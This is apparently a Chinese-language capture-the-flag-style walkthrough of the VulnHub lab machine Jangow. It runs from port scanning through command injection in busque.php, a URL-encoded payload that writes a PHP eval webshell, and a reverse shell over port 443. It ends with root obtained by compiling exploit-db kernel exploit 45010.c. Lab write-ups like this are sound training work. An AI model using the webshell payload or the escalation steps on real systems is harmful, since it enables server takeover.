打靶筆記-04-vulnhub-Jangow

打靶筆記-04-vulnhub-Jangow

前面兩篇名稱寫成了vulhub，已經更改為vulnhub;vulhub的之後再找個時間集中打一遍。

一、靶機資訊

Name: Jangow: 1.0.1 （Easy）
Date release: 4 Nov 2021
Author: Jangow
Series: Jangow

二、啟動靶機

2.1 校驗靶機

2.2 匯入Vbox，配置網路

因為攻擊機器都在vmware上，所以還是將靶機網路橋接到vmnet8網路卡上。

2.3 打快照，啟動靶機

沒啥好說的，以防萬一，打個快照啟動

可以直接看到ip地址，不過按照實際中的話時看不到這個介面的。

三、開始打靶

3.1 資訊蒐集

3.1.1 主機發現

ifconfig
sudo arp-scan -I eth0 -l

獲得靶機IP 172.16.95.140

3.1.2 埠發現

sudo nmap -p- 172.16.95.140

只開放22和80埠

3.1.3 進一步確認埠背後服務以及具體版本號

sudo nmap -sV -p22,80 172.16.95.140

可以看到22埠是filtered的狀態，也就是22埠被防火牆過濾了，80埠對應的是Apache httpd 2.4.18

3.1.4 使用nmap預設指令碼掃描

sudo nmap -sC -p22,80 172.16.95.140

貌似沒有啥發現，80埠也掛載的是普通頁面，先看看去

3.2 開始滲透

3.2.1 訪問80埠

是個目錄，繼續點，發現是個網頁，然後裡面有一個目錄連結site，繼續點

最後發現個連結指向一個busque.php檔案，並且擁有引數buscar可以接收值，但不知道幹啥用的，最後經過fuzz測試，確定為命令執行

3.2.2 資訊收集

既然是命令執行，那就可以直接來一波簡單的資訊收集

id
pwd
ls
ls ./wordpress
cat ./wordpress

在進行常規資訊蒐集後，發現有一個wordpress的目錄，並且還獲取到了資料庫賬
不過以上好像沒啥用，資料庫也無法訪問，也沒有更多有用的目錄。

3.2.3 寫入小馬

因為命令執行，所以嘗試了各種姿勢反彈shell，可能是水平不夠，wget也無法下載到遠端伺服器上的馬兒，所以就開始嘗試寫入小馬

http://172.16.95.140/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_POST[%27ant%27]);?%3E%27%20%3E1.php

成功寫入，上蟻劍，連線成功

繼續收集資訊，獲得使用者jangow01家目錄下有個user.txt，內容似乎是md5加密的，可以順手破解一下，不過好像是空的，沒有任何內容，奇怪

翻了翻其他目錄在html目錄下發現.backup檔案，裡面是使用者jangow01的mysql賬戶密碼

然後嘗試上傳反彈shell的php檔案也無法反彈成功

3.2.4 反彈shell

蟻劍雖然連線成功了，但是shell最終還是個webshell，可乾的事兒有限，所以還是的反彈shell提權
經歷過剛剛命令執行反彈shell失敗，然後嘗試上傳反彈shell的php檔案也失敗了，聯想剛開始埠掃描時22埠被過濾的情況，應該是目標機器防火牆搞得鬼。
不過好在目標機器nc可以使用，不過最終也沒有反彈成功，因為它無法帶-e引數。
=-=
打到這兒自己就沒思路了，最後檢視了別人的攻略，這兒的關鍵點在於目標機器防火牆對進出的埠進行了限制，最後嘗試了443埠可以成功利用

nc -lvnp 443

3.2.5 升級shell為tty

which python python2 python3 py py2 py3
python -c 'import pty;pty.spawn("/bin/bash")';
export TERM=xterm-256color
stty raw -echo;fg

3.2.6 尋找漏洞提權

升級shell之後，就可以sudo和su了，結合之前發現的兩個mysql賬戶名密碼，嘗試了以下切換使用者，結果mysql的賬戶密碼和系統的賬戶密碼一致。

然後嘗試sudo的時候失敗了，好像不是英文，不過看到了個sudoer，猜測應該是提示這個使用者不再sudoer檔案中，也就是沒有sudo的許可權。

那就看看有沒有其他漏洞可以利用吧

uname -r
uname -a
lsb_release -a

ubuntu的版本為16.04.1 LTS

searchsploit Linux Kernel 4.4.

這個搜尋到的有很多看著比較符合，不過這個有點意思的是有個在windows的分類下，有點奇怪，先拿它看看

sudo cp /usr/share/exploitdb/exploits/windows_x86-64/local/47170.c /var/www/html/test.c

然後在目標機器上下載test.c，結果都無法搞定，應該是對方防火牆導致的。
=-=，一會兒提權成功一定要看下它的防火牆策略，最後通過蟻劍傳了過去，不過gcc編譯失敗了

繼續換linux/local/45010.c

sudo cp /usr/share/exploitdb/exploits/linux/local/45010.c ./ 

然後還是通過蟻劍上傳編譯執行，最後成功拿到root許可權

ls
gcc -o exp 45010.c
chmod +x exp
./exp
id

3.2.7 檢視防火牆

bash
sudo ufw status

果然，=-=，禁止訪問任何埠，除了443

關閉防火牆，可以成功訪問，真變態

四、總結

這個靶機難點就是能夠找到唯一可利用的443埠進行反彈shell，沒有這個埠，有再多的反彈姿勢，防火牆攔截的死死的，除非能用webshell進行本地提權，這個不現實，至少對我來說是的，能力不夠
然後看到別人有批量提權的指令碼，先記錄下，隨後的靶機中嘗試以下
linux 提權輔助指令碼

敖～，果然特麼神器=-=
原諒我這個菜雞現在才找到這些神器，應該在自己犯懶的時候先找下有沒有懶人神器，沒有的話自己總結搞一個，加油～～～